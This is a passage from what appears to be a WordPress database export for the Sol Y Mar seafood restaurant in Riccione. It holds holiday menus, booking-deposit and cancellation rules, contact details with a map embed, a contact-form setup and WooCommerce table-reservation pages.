Nostrano croccante e mela verde\r\nCappelletto ai carciofi con mazzancolle nostrane\r\nFiletto di rombo alla griglia con insalatina di finocchio e arance\r\nDessert\r\n48€ bevande escluse\r\nBambini 7/13 anni menù dedicato 25 €\r\n1 /6 anni ordinazione libera </em>\r\n\r\nVi informiamo che la prenotazione(da effettuarsi esclusivamente via telefono) si intende confermata solo dopo il versamento della caparra, e che la stessa andrà versata entro 3 giorni dalla prenotazione telefonica, pena cancellazione della stessa.\r\nÈ possibile disdire la prenotazione e avere il rimborso della caparra, entro giovedi per la domenica di Pasqua, ed entro venerdi per il lunedi di Pasquetta, avvisando telefonicamente il ristorante.\r\nVi chiediamo gentilmente di non prendervela con  chi vi risponde al telefono,il quale  segue le nostre indicazioni, e che la richiesta della caparra, non è ne una mancanza di rispetto e fiducia nei vostri confronti, ne una distinzione in base alla frequentazione del ristorante, ma una semplice tutela verso quei(per fortuna pochi) maleducati che sono soliti prenotare e poi non presentarsi, o chiamare per disdire addirittura dopo l’orario prenotato.\r\nSiamo certi che potrete capire che quello che per voi è svago, per noi è lavoro al pari di qualsiasi altra professione. Grazie per la comprensione\r\nTeo,Barbara e tutto lo staff del Sol Y Mar\r\n\r\n[sc name=\"Paypal pasqua\"]','Menù di Pasqua 2016','','publish','open','open','','menu-di-pasqua-2016','','','2016-03-07 07:53:23','2016-03-07 06:53:23','',0,'http://www.ristorantesolymar.it/?p=187',0,'post','',0),(188,1,'2016-03-07 07:31:38','2016-03-07 06:31:38','Di seguito alcune informazioni riguardanti il week end di Pasqua 2016-03-16\r\nDomenica a pranzo menu fisso(vedi sotto) caparra obbligatoria\r\nDomenica  a cena e lunedì a pranzo menù alla carta , caparra obbligatoria\r\n\r\n<em>Brilla nell\' aria\r\nPrimavera d\'intorno.\r\nBrilla nell\' aria\r\ne per li campi esulta,\r\nsi\' ch\' a mirarla intenerisce il core\r\nodi greggi belar, muggire armenti\r\ne gli altri augelli contenti\r\na gara insieme,\r\nper lo libero ciel\r\nfan mille giri,\r\npur festeggiando il lor tempo migliore (G.Leopardi )\r\nDomenica 27 marzo\r\nPranzo\r\nPasqua 2016\r\nEntrée di Benvenuto\r\nBocconcino di Cernia al lime su crudo di asparagi ,zucchinee topinambur\r\nFondale Marino:variazioni sui frutti di mare\r\nCalamaretto Nostrano croccante e mela verde\r\nCappelletto ai carciofi con mazzancolle nostrane\r\nFiletto di rombo alla griglia con insalatina di finocchio e arance\r\nDessert\r\n48€ bevande escluse\r\nBambini 7/13 anni menù dedicato 25 €\r\n1 /6 anni ordinazione libera </em>\r\n\r\nVi informiamo che la prenotazione(da effettuarsi esclusivamente via telefono) si intende confermata solo dopo il versamento della caparra, e che la stessa andrà versata entro 3 giorni dalla prenotazione telefonica, pena cancellazione della stessa.\r\nÈ possibile disdire la prenotazione e avere il rimborso della caparra, entro giovedi per la domenica di Pasqua, ed entro venerdi per il lunedi di Pasquetta, avvisando telefonicamente il ristorante.\r\nVi chiediamo gentilmente di non prendervela con  chi vi risponde al telefono,il quale  segue le nostre indicazioni, e che la richiesta della caparra, non è ne una mancanza di rispetto e fiducia nei vostri confronti, ne una distinzione in base alla frequentazione del ristorante, ma una semplice tutela verso quei(per fortuna pochi) maleducati che sono soliti prenotare e poi non presentarsi, o chiamare per disdire addirittura dopo l’orario prenotato.\r\nSiamo certi che potrete capire che quello che per voi è svago, per noi è lavoro al pari di qualsiasi altra professione. Grazie per la comprensione\r\nTeo,Barbara e tutto lo staff del Sol Y Mar\r\n','Menù di Pasqua 2016','','inherit','closed','closed','','187-revision-v1','','','2016-03-07 07:31:38','2016-03-07 06:31:38','',187,'http://www.ristorantesolymar.it/2016/03/07/187-revision-v1/',0,'revision','',0),(189,1,'2016-03-07 07:38:45','2016-03-07 06:38:45','Di seguito alcune informazioni riguardanti il week end di Pasqua 2016-03-16\r\nDomenica a pranzo menu fisso(vedi sotto) caparra obbligatoria\r\nDomenica  a cena e lunedì a pranzo menù alla carta , caparra obbligatoria\r\n\r\n<em>Brilla nell\' aria\r\nPrimavera d\'intorno.\r\nBrilla nell\' aria\r\ne per li campi esulta,\r\nsi\' ch\' a mirarla intenerisce il core\r\nodi greggi belar, muggire armenti\r\ne gli altri augelli contenti\r\na gara insieme,\r\nper lo libero ciel\r\nfan mille giri,\r\npur festeggiando il lor tempo migliore (G.Leopardi )\r\nDomenica 27 marzo\r\nPranzo\r\nPasqua 2016\r\nEntrée di Benvenuto\r\nBocconcino di Cernia al lime su crudo di asparagi ,zucchinee topinambur\r\nFondale Marino:variazioni sui frutti di mare\r\nCalamaretto Nostrano croccante e mela verde\r\nCappelletto ai carciofi con mazzancolle nostrane\r\nFiletto di rombo alla griglia con insalatina di finocchio e arance\r\nDessert\r\n48€ bevande escluse\r\nBambini 7/13 anni menù dedicato 25 €\r\n1 /6 anni ordinazione libera </em>\r\n\r\nVi informiamo che la prenotazione(da effettuarsi esclusivamente via telefono) si intende confermata solo dopo il versamento della caparra, e che la stessa andrà versata entro 3 giorni dalla prenotazione telefonica, pena cancellazione della stessa.\r\nÈ possibile disdire la prenotazione e avere il rimborso della caparra, entro giovedi per la domenica di Pasqua, ed entro venerdi per il lunedi di Pasquetta, avvisando telefonicamente il ristorante.\r\nVi chiediamo gentilmente di non prendervela con  chi vi risponde al telefono,il quale  segue le nostre indicazioni, e che la richiesta della caparra, non è ne una mancanza di rispetto e fiducia nei vostri confronti, ne una distinzione in base alla frequentazione del ristorante, ma una semplice tutela verso quei(per fortuna pochi) maleducati che sono soliti prenotare e poi non presentarsi, o chiamare per disdire addirittura dopo l’orario prenotato.\r\nSiamo certi che potrete capire che quello che per voi è svago, per noi è lavoro al pari di qualsiasi altra professione. Grazie per la comprensione\r\nTeo,Barbara e tutto lo staff del Sol Y Mar\r\n\r\n[sc name=\"Paypal pasqua\"]','Menù di Pasqua 2016','','inherit','closed','closed','','187-revision-v1','','','2016-03-07 07:38:45','2016-03-07 06:38:45','',187,'http://www.ristorantesolymar.it/2016/03/07/187-revision-v1/',0,'revision','',0),(190,1,'2016-03-07 07:57:55','2016-03-07 06:57:55','Indirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\r\nTelefono: 0541 648528 (oppure 3206962059 in caso di malfuzionamento linea)\r\nOrari: 12:30–14:00, 19:30–22:00\r\nEmail: info @ ristorantesolymar . it\r\nGiorno di chiusura lunedì. Sono previste alcune eccezioni in caso di gruppi numerosi, fiere, festività o periodo determinati. Si consiglia sempre di telefonare prima.\r\n\r\n<iframe width=\"100%\" height=\"400\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.it/maps?f=q&amp;source=s_q&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.it/maps?f=q&amp;source=embed&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A\" style=\"color:#0000FF;text-align:left\">Visualizzazione ingrandita della mappa</a></small>\r\n\r\nSiamo recensiti positivamente su TripAdvisor, Google+, <a href=\"http://www.baltazar.it/locali/italia/emilia-romagna/riccione/sol-y-mar-riccione/\" target=\"_blank\">Baltazar</a> e tante altre guide online.','Contatti','','inherit','closed','closed','','28-revision-v1','','','2016-03-07 07:57:55','2016-03-07 06:57:55','',28,'http://www.ristorantesolymar.it/2016/03/07/28-revision-v1/',0,'revision','',0),(192,1,'2016-03-17 14:41:51','2016-03-17 13:41:51','<img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2016/02/happyvalentines-300x300.jpg\" alt=\"happyvalentines\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-182\" />Si vede bene solo con gli occhi \r\nL essenziale é invisibile agli occhi \r\n(Antoine de Saint -Exupery)\r\n14 febbraio ❤❤\r\nMenu \' sia a pranzo che a cena\r\nIl nostro cannolo siciliano con crudo di mazzancolle e ricotta\r\nTagliatelle di Seppia allo scoglio\r\nMantecato di Baccalà croccante e soffice di peperone dolce\r\nCappelletti di patate e basilico in guazzetto di Astice\r\nOmbrina al pane di pomodoro su spuma di patate\r\nDessert (sorpresa)\r\n45 € cd \r\nBevande escluse\r\nL immagine è volutamente provocatoria \r\nStop alle violenze sulle Donne','Menù di San Valentino 2016','','inherit','closed','closed','','181-revision-v1','','','2016-03-17 14:41:51','2016-03-17 13:41:51','',181,'http://www.ristorantesolymar.it/2016/03/17/181-revision-v1/',0,'revision','',0),(194,1,'2016-04-20 17:00:51','2016-04-20 15:00:51','','','','inherit','open','closed','','img_1441-1920x1275','','','2016-04-20 17:01:10','2016-04-20 15:01:10','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1441-1920x1275.jpg',0,'attachment','image/jpeg',0),(195,1,'2016-04-20 17:01:38','2016-04-20 15:01:38','','','','inherit','open','closed','','img_1922-1920x1275','','','2016-04-20 17:01:58','2016-04-20 15:01:58','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1922-1920x1275.jpg',0,'attachment','image/jpeg',0),(196,1,'2016-04-20 17:02:23','2016-04-20 15:02:23','','','','inherit','open','closed','','img_1608-1920x1275','','','2016-04-20 17:02:38','2016-04-20 15:02:38','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1608-1920x1275.jpg',0,'attachment','image/jpeg',0),(197,1,'2016-04-20 17:07:23','2016-04-20 15:07:23','','','','inherit','open','closed','','img_1441-1920x600','','','2016-04-20 17:07:37','2016-04-20 15:07:37','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2016/04/IMG_1441-1920x600.jpg',0,'attachment','image/jpeg',0),(198,1,'2016-04-20 18:42:14','2016-04-20 16:42:14','','','','inherit','open','closed','','sol-y-mar-logo-150','','','2016-04-20 18:42:40','2016-04-20 16:42:40','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2016/04/sol-y-mar-logo-150.png',0,'attachment','image/png',0),(199,1,'2016-04-20 18:46:47','2016-04-20 16:46:47','','','','inherit','open','closed','','serata-1920x1275','','','2016-04-20 18:47:00','2016-04-20 16:47:00','',0,'http://www.ristorantesolymar.it/wp-content/uploads/2016/04/serata-1920x1275.jpg',0,'attachment','image/jpeg',0),(200,1,'2016-04-20 19:33:36','2016-04-20 17:33:36','[gallery size=\"medium\" link=\"file\" ids=\"143,147,146,145,144,135,136,137,138,142,134,67,40\"]','Gallery','','inherit','closed','closed','','141-revision-v1','','','2016-04-20 19:33:36','2016-04-20 17:33:36','',141,'http://www.ristorantesolymar.it/2016/04/20/141-revision-v1/',0,'revision','',0),(201,1,'2016-04-20 19:37:08','2016-04-20 17:37:08','<h2>La location</h2>\r\n[gallery size=\"medium\" link=\"file\" columns=\"2\" ids=\"67,135,137,138\"]\r\n\r\n<h2>I piatti</h2>\r\n[gallery link=\"file\" columns=\"2\" size=\"medium\" ids=\"146,145,144,143,142,136,147,134\"]','Gallery','','inherit','closed','closed','','141-revision-v1','','','2016-04-20 19:37:08','2016-04-20 17:37:08','',141,'http://www.ristorantesolymar.it/2016/04/20/141-revision-v1/',0,'revision','',0),(202,1,'2016-04-20 19:38:23','2016-04-20 17:38:23','<h2>La location</h2>\r\n[gallery size=\"medium\" link=\"file\" columns=\"2\" ids=\"67,135,137,138\"]\r\n<h2>I piatti</h2>\r\n[gallery link=\"file\" columns=\"2\" size=\"medium\" ids=\"146,143,145,144,142,136,147,134\"]','Gallery','','inherit','closed','closed','','141-revision-v1','','','2016-04-20 19:38:23','2016-04-20 17:38:23','',141,'http://www.ristorantesolymar.it/2016/04/20/141-revision-v1/',0,'revision','',0),(203,1,'2016-04-21 10:09:54','2016-04-21 08:09:54','<p>Il tuo nome (richiesto)<br />\r\n    [text* your-name] </p>\r\n\r\n<p>La tua email (richiesto)<br />\r\n    [email* your-email] </p>\r\n\r\n<p>Il tuo telefono (richiesto)<br />\r\n    [tel* tel-955] </p>\r\n\r\n<p>Oggetto<br />\r\n    [text your-subject] </p>\r\n\r\n<p>Il tuo messaggio<br />\r\n    [textarea your-message] </p>\r\n\r\n<p>Quiz antispam<br />\r\n\r\n[recaptcha]</p>\r\n\r\n<p>Accettazione Privacy\r\n [acceptance accettazione-privacy]</p>\r\n\r\n<p>[submit \"Invia\"]</p>\n1\nDa sito Sol Y Mar: \"[your-subject]\"\n[your-name] <notifiche@ristorantesolymar.it>\nteosphone@gmail.com\nDa: [your-name] <[your-email]>\r\nTelefono: [tel-955]\r\nOggetto: [your-subject]\r\n\r\nCorpo del messaggio:\r\n[your-message]\r\n\r\n[accettazione-privacy]\r\n\r\n--\r\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)\nReply-To: [your-email]\n\n\n\n\nSol Y Mar \"[your-subject]\"\nSol Y Mar <wordpress@www.ristorantesolymar.it>\n[your-email]\nCorpo del messaggio:\r\n[your-message]\r\n\r\n--\r\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (http://www.ristorantesolymar.it)\nReply-To: webmaster@baldisserri.com\n\n\n\nGrazie per il tuo messaggio. È stato inviato.\nSi è verificato un errore durante l\'invio del tuo messaggio. Per favore prova di nuovo.\nUno o più campi hanno errori. Per favore controlla e prova di nuovo.\nSi è verificato un errore durante l\'invio del tuo messaggio. Per favore prova di nuovo.\nDevi accettare termini e condizioni prima di inviare il tuo messaggio.\nIl campo è richiesto.\nIl campo è troppo lungo.\nIl campo è troppo corto.\nIl formato della data non è corretto.\nLa data è antecedente alla prima data consentita.\nLa data è successiva all\'ultima data consentita.\nSi è verificato un errore sconosciuto durante il caricamento del file.\nNon sei abilitato al caricamenti di file di questo tipo.\nIl file è troppo grande.\nSi è verificato un errore nel caricare il file.\nIl formato numerico non è valido.\nIl numero è inferiore al minimo consentito.\nIl numero è superiore al massimo consentito.\nLa risposta al quiz non è corretta.\nIl codice che hai inserito non è valido.\nL\'indirizzo e-mail inserito non è valido.\nL\'URL non è valido.\nIl numero di telefono non è valido.','Modulo di contatto 1','','publish','closed','closed','','modulo-di-contatto-1','','','2018-12-14 21:10:31','2018-12-14 20:10:31','',0,'http://www.ristorantesolymar.it/?post_type=wpcf7_contact_form&#038;p=203',0,'wpcf7_contact_form','',0),(204,1,'2016-04-21 10:12:27','2016-04-21 08:12:27','Indirizzo: Viale D\'Annunzio, 190, 47838 Riccione RN\r\nTelefono: 0541 648528 (oppure 3206962059 in caso di malfuzionamento linea)\r\nOrari: 12:30–14:00, 19:30–22:00\r\nEmail: info @ ristorantesolymar . it , oppure puoi utilizzare il modulo a fondo pagina\r\nGiorno di chiusura lunedì. Sono previste alcune eccezioni in caso di gruppi numerosi, fiere, festività o periodo determinati. Si consiglia sempre di telefonare prima.\r\n\r\n<iframe width=\"100%\" height=\"400\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.it/maps?f=q&amp;source=s_q&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.it/maps?f=q&amp;source=embed&amp;hl=it&amp;geocode=&amp;q=Sol+Y+Mar,+Riccione,+RN&amp;aq=0&amp;oq=ristorante+sol+y+&amp;sll=44.435505,10.985057&amp;sspn=2.286705,5.064697&amp;ie=UTF8&amp;hq=Sol+Y+Mar,&amp;hnear=Riccione,+Rimini,+Emilia-Romagna&amp;t=m&amp;cid=7306077362099112647&amp;ll=44.024545,12.631702&amp;spn=0.043201,0.11158&amp;z=13&amp;iwloc=A\" style=\"color:#0000FF;text-align:left\">Visualizzazione ingrandita della mappa</a></small>\r\n\r\nSiamo recensiti positivamente su TripAdvisor, Google+, <a href=\"http://www.baltazar.it/locali/italia/emilia-romagna/riccione/sol-y-mar-riccione/\" target=\"_blank\">Baltazar</a> e tante altre guide online.','Contatti','','inherit','closed','closed','','28-revision-v1','','','2016-04-21 10:12:27','2016-04-21 08:12:27','',28,'http://www.ristorantesolymar.it/2016/04/21/28-revision-v1/',0,'revision','',0),(4302,1,'2018-08-03 14:29:57','2018-08-03 14:29:57','','shop-img-28','','inherit','open','closed','','shop-img-28','','','2018-08-03 14:29:57','2018-08-03 14:29:57','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/shop-img-28.jpg',0,'attachment','image/jpeg',0),(207,1,'2016-11-25 14:47:19','2016-11-25 13:47:19','','Shop','','publish','closed','closed','','negozio','','','2017-07-06 23:39:50','2017-07-06 21:39:50','',0,'http://www.ristorantesolymar.it/negozio/',0,'page','',0),(208,1,'2016-11-25 14:47:19','2016-11-25 13:47:19','[woocommerce_cart]','Carrello','','publish','closed','closed','','carrello','','','2016-11-25 14:47:19','2016-11-25 13:47:19','',0,'http://www.ristorantesolymar.it/carrello/',0,'page','',0),(209,1,'2016-11-25 14:47:19','2016-11-25 13:47:19','[woocommerce_checkout]','Cassa','','publish','closed','closed','','checkout','','','2016-11-25 14:47:19','2016-11-25 13:47:19','',0,'http://www.ristorantesolymar.it/checkout/',0,'page','',0),(210,1,'2016-11-25 14:47:19','2016-11-25 13:47:19','[woocommerce_my_account]','Il mio account','','publish','closed','closed','','mio-account','','','2016-11-25 14:47:19','2016-11-25 13:47:19','',0,'http://www.ristorantesolymar.it/mio-account/',0,'page','',0),(211,1,'2016-11-25 15:34:59','2016-11-25 14:34:59','Tavolo per 2 persone - anticipo caparra confirmatoria\r\n\r\n<strong>Capodanno 2018</strong>\r\n- Fetuccine di sogliola e daikon con rapa rossa, melograno e pompelmo rosa\r\n- hamburger di mazzancolle nostrane , crema di lenticchie di castelluccio e ristretto di mazzancolle\r\n- salsiccia di rombo su polenta bianca e funghi\r\n- sfoja lorda al fossa con ragu di triglia e crema di zucca al passion fruit\r\n- astice scottato con broccolo romanesco e salsa all’aglio nero\r\n- cogli la prima mela','Prenotazione Tavolo per 2 Persone - Capodanno 2018','Prenotazione tavolo per 2 persone\r\n<strong>Capodanno 2018</strong>','draft','closed','closed','','tavolo-2-persone','','','2018-03-10 08:50:40','2018-03-10 07:50:40','',0,'http://www.ristorantesolymar.it/?post_type=product&#038;p=211',1,'product','',0),(212,1,'2016-11-25 15:34:34','2016-11-25 14:34:34','','tavolo-riservato','','inherit','open','closed','','tavolo-riservato','','','2016-11-25 15:34:34','2016-11-25 14:34:34','',211,'http://www.ristorantesolymar.it/wp-content/uploads/2016/11/tavolo-riservato.png',0,'attachment','image/png',0),(213,1,'2016-11-25 15:55:32','2016-11-25 14:55:32','Tavolo per <strong>3 persone</strong> - anticipo caparra confirmatoria\r\n\r\n<strong>Capodanno 2018</strong>\r\n- Fetuccine di sogliola e daikon con rapa rossa, melograno e pompelmo rosa\r\n- hamburger di mazzancolle nostrane , crema di lenticchie di castelluccio e ristretto di mazzancolle\r\n- salsiccia di rombo su polenta bianca e funghi\r\n- sfoja lorda al fossa con ragu di triglia e crema di zucca al passion fruit\r\n- astice scottato con broccolo romanesco e salsa all’aglio nero\r\n- cogli la prima mela','Prenotazione Tavolo per 3 Persone - Capodanno 2018','Prenotazione tavolo per <strong>3 persone</strong>','draft','closed','closed','','prenotazione-tavolo-3-persone','','','2018-03-10 08:50:40','2018-03-10 07:50:40','',0,'http://www.ristorantesolymar.it/prodotto/tavolo-3-persone/',1,'product','',0),(215,1,'2017-12-02 07:55:51','2017-12-02 06:55:51','Tavolo per 2 persone - anticipo caparra confirmatoria\n\n<strong>Capodanno 2018</strong>\n- Fetuccine di sogliola e daikon con rapa rossa, melograno e pompelmo rosa\n- hamburger di mazzancolle nostrane , crema di lenticchie di castelluccio e ristretto di mazzancolle\n- salsiccia di rombo su polenta bianca e funghi\n- sfoja lorda al fossa con ragu di triglia e crema di zucca al passion fruit\n- astice scottato con broccolo romanesco e salsa all’aglio nero\n- cogli la prima mela','Prenotazione Tavolo per 2 Persone','Prenotazione tavolo per 2 persone\n<strong>Capodanno 2018</strong>\n- Fetuccine di sogliola e daikon con rapa rossa, melograno e pompelmo rosa\n- hamburger di mazzancolle nostrane , crema di lenticchie di castelluccio e ristretto di mazzancolle\n- salsiccia di rombo su polenta bianca e funghi\n- sfoja lorda al fossa con ragu di triglia e crema di zucca al passion fruit\n- astice scottato con broccolo romanesco e salsa all’aglio nero\n- cogli la prima mela','inherit','closed','closed','','211-autosave-v1','','','2017-12-02 07:55:51','2017-12-02 06:55:51','',211,'http://www.ristorantesolymar.it/2016/11/25/211-autosave-v1/',0,'revision','',0),(216,1,'2016-11-25 17:17:59','2016-11-25 16:17:59','Tavolo per <strong>4 persone</strong> - anticipo caparra confirmatoria\r\n\r\n<strong>Capodanno 2018</strong>\r\n- Fetuccine di sogliola e daikon con rapa rossa, melograno e pompelmo rosa\r\n- hamburger di mazzancolle nostrane , crema di lenticchie di castelluccio e ristretto di mazzancolle\r\n- salsiccia di rombo su polenta bianca e funghi\r\n- sfoja lorda al fossa con ragu di triglia e crema di zucca al passion fruit\r\n- astice scottato con broccolo romanesco e salsa all’aglio nero\r\n- cogli la prima mela','Prenotazione Tavolo per 4 Persone - Capodanno 2018','Prenotazione tavolo per <strong>3 persone</strong>','draft','closed','closed','','prenotazione-tavolo-per-4-persone','','','2018-03-10 08:50:39','2018-03-10 07:50:39','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-4-persone/',1,'product','',0),(220,1,'2016-11-25 18:10:54','2016-11-25 17:10:54','Tavolo per <strong>6 persone</strong> - anticipo caparra confirmatoria','Prenotazione Tavolo per 6 Persone - Capodanno 2018','Prenotazione tavolo per <strong>6 persone</strong>','draft','closed','closed','','prenotazione-tavolo-per-6-persone','','','2018-03-10 08:50:39','2018-03-10 07:50:39','',0,'http://www.ristorantesolymar.it/prodotto/prenotazione-tavolo-per-6-persone/',1,'product','',0),(224,1,'2016-11-25 21:42:28','2016-11-25 20:42:28','<h2>La location</h2>\r\n[gallery size=\"medium\" link=\"file\" columns=\"2\" ids=\"67,135,137,138\"]\r\n<h2>I piatti</h2>\r\n[gallery link=\"file\" ids=\"146,143,145,144,142,136,147,134\"]','Gallery','','inherit','closed','closed','','141-revision-v1','','','2016-11-25 21:42:28','2016-11-25 20:42:28','',141,'http://www.ristorantesolymar.it/2016/11/25/141-revision-v1/',0,'revision','',0),(225,2,'2016-11-26 19:25:40','2016-11-26 18:25:40','<img class=\"alignright size-medium wp-image-236\" src=\"http://www.ristorantesolymar.it/wp-content/uploads/2016/11/capodanno-solymar-300x300.jpg\" alt=\"capodanno-solymar\" width=\"250\" height=\"250\" /><em>Spaghettino di spigola alla carbonara</em>\r\n\r\nRicordo di infanzia: Filetto di paganello su crema di pancotto e giardiniera della casa\r\n\r\nTriglia di scoglio al tartufo con patate vitelotte e fonduta al pecorino di fossa\r\n\r\nStrozzapreti lunghi con mazzancolle nostrane, salsiccia di mora romagnola e zucca\r\n\r\nTataki di rana pescatrice alle erbe e radici in varie forme e consistenze\r\n\r\nPepe,ricotta e fichi caramellati\r\n\r\n65,00€ a persona escluse bevande\r\n\r\n<strong>Prenota online il tuo tavolo per Capodanno 2017 a Riccione</strong>\r\n\r\n[product_category category=\"capodanno\"]\r\n\r\n<strong>Modalità di prenotazione per il cenone di capodanno</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età, (in caso di eventuale eccedenza di caparra, l’importo verrà conguagliato sul totale) nome di chi prenota e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione e ricevere il rimborso della caparra, entro e non oltre le ore 12,00 di giovedì 29 dicembre , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante, dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci al ristorante fino all’11 e dal 27 dicembre, mentre dal 12 al 26 dicembre(causa chiusura per ferie), potete contattarci alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica postasolymar@libero.it.\r\nGrazie per la comprensione\r\nTeo &amp; Barbara','Menu di San Silvestro 2017','','publish','open','open','','menu-san-silvestro-2017','','','2017-02-04 09:52:37','2017-02-04 08:52:37','',0,'http://www.ristorantesolymar.it/?p=225',0,'post','',0),(226,1,'2016-11-26 19:25:40','2016-11-26 18:25:40','<h2><em>Spaghettino di spigola alla carbonara\r\n\r\nRicordo di infanzia: Filetto di paganello su crema di pancotto e giardiniera della casa\r\n\r\nTriglia di scoglio al tartufo con patate vitelotte e fonduta al pecorino di fossa\r\n\r\nStrozzapreti lunghi con mazzancolle nostrane, salsiccia di mora romagnola e zucca\r\n\r\nTataki di rana pescatrice alle erbe e radici in varie forme e consistenze\r\n\r\nPepe,ricotta e fichi caramellati\r\n\r\n65,00€ a persona escluse bevande</em></h2>\r\n\r\n<strong>Prenota online il tuo tavolo per Capodanno 2017 a Riccione</strong>\r\n\r\n[product_categories number=\"4\" parent=\"7\"]\r\n\r\n<strong>Modalità di prenotazione per il cenone di capodanno</strong>\r\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\r\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età, (in caso di eventuale eccedenza di caparra, l’importo verrà conguagliato sul totale) nome di chi prenota e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\r\nÈ possibile annullare la prenotazione e ricevere il rimborso della caparra, entro e non oltre le ore 12,00 di giovedì 29 dicembre , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante, dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. \r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nPer maggiori dettagli, richieste di spiegazioni o necessità varie, potete contattarci al ristorante fino all’11 e dal 27 dicembre, mentre dal 12 al 26 dicembre(causa chiusura per ferie), potete contattarci alla nostra pagina facebook “ristorante sol y mar – riccione, o all’indirizzo di posta elettronica       postasolymar@libero.it.\r\nGrazie per la comprensione  \r\nTeo &  Barbara \r\n','Menu di San Silvestro 2017','','inherit','closed','closed','','225-revision-v1','','','2016-11-26 19:25:40','2016-11-26 18:25:40','',225,'http://www.ristorantesolymar.it/2016/11/26/225-revision-v1/',0,'revision','',0),(227,1,'2016-11-26 19:27:18','2016-11-26 18:27:18','<em>Spaghettino di spigola alla carbonara\n\nRicordo di infanzia: Filetto di paganello su crema di pancotto e giardiniera della casa\n\nTriglia di scoglio al tartufo con patate vitelotte e fonduta al pecorino di fossa\n\nStrozzapreti lunghi con mazzancolle nostrane, salsiccia di mora romagnola e zucca\n\nTataki di rana pescatrice alle erbe e radici in varie forme e consistenze\n\nPepe,ricotta e fichi caramellati\n\n65,00€ a persona escluse bevande</em>\n\n<strong>Prenota online il tuo tavolo per Capodanno 2017 a Riccione</strong>\n\n[product_category category=\"capodanno\"]\n\n<strong>Modalità di prenotazione per il cenone di capodanno</strong>\nDi seguito è riportata la disponibilità dei tavoli con la relativa capienza, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato.\nLa scheda va compilata per intero, specificando numero di adulti ed eventuali bambini, e la loro età, (in caso di eventuale eccedenza di caparra, l’importo verrà conguagliato sul totale) nome di chi prenota e numero di cellulare raggiungibile, non che eventuali allergie o intolleranze.\nÈ possibile annullare la prenotazione e ricevere il rimborso della caparra, entro e non oltre le ore 12,00 di giovedì 29 dicembre , solo ed esclusivamente mediante telefonata (non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) al ristorante, dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\nNel caso in cui le persone arrivate siano meno di quelle prenotate(senza disdetta entro la sopracitata data), le caparre degli assenti non saranno usufruibili dai presenti ma saranno sempre da considerarsi rimborso per no show. \nLa ricevuta del pagamento, 